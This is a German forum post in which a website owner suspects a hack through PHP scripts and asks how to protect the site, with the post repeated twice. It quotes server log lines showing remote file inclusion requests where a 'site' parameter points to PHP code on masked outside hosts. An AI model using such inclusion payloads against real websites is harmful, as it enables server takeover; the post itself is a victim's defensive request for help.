Meine Homepage wurde mittels php scripten gehackt glaube ich zumindest. Wie kann ich mich in Zukunft davor schützen?
Hier sind ein paar Ausschnitte aus logdateien wir man sich Zugriff erschafft hat. Ein paar Angaben sind verändert damit man nicht auf die jeweiligen Seiten kommt.
"GET /gfx/button-off2.jpg HTTP/1.1" 200 2178 "http://www.xxx.de/index.php?site=http://xxx.com/blade_tea/banda.txt"
"POST /index.php?site=http://xxx.xxxxxx.xx.xx/upload/skins/max.txt? HTTP/1.1"
"GET /index.php?site=http://xxx.xxx/blade_tea/aku.txt HTTP/1.1"
Davon sind noch mehr da. In diesen Textdateien ist php-code. Ich habe die ganzen Scripte die aufgerufen wurden mal gespeichert. Eines davon war noch ein Exploit und ein anderes ein Trojaner.
Was ich nicht verstehe, dass das überhaupt erlaubt ist von anderen Servern Scripte auszuführen. Wenn sich jemand die Scripte anschauen will schicke ich Sie ihm.
Gruß
toohappy
Hier sind ein paar Ausschnitte aus logdateien wir man sich Zugriff erschafft hat. Ein paar Angaben sind verändert damit man nicht auf die jeweiligen Seiten kommt.
"GET /gfx/button-off2.jpg HTTP/1.1" 200 2178 "http://www.xxx.de/index.php?site=http://xxx.com/blade_tea/banda.txt"
"POST /index.php?site=http://xxx.xxxxxx.xx.xx/upload/skins/max.txt? HTTP/1.1"
"GET /index.php?site=http://xxx.xxx/blade_tea/aku.txt HTTP/1.1"
Davon sind noch mehr da. In diesen Textdateien ist php-code. Ich habe die ganzen Scripte die aufgerufen wurden mal gespeichert. Eines davon war noch ein Exploit und ein anderes ein Trojaner.
Was ich nicht verstehe, dass das überhaupt erlaubt ist von anderen Servern Scripte auszuführen. Wenn sich jemand die Scripte anschauen will schicke ich Sie ihm.
Gruß
toohappy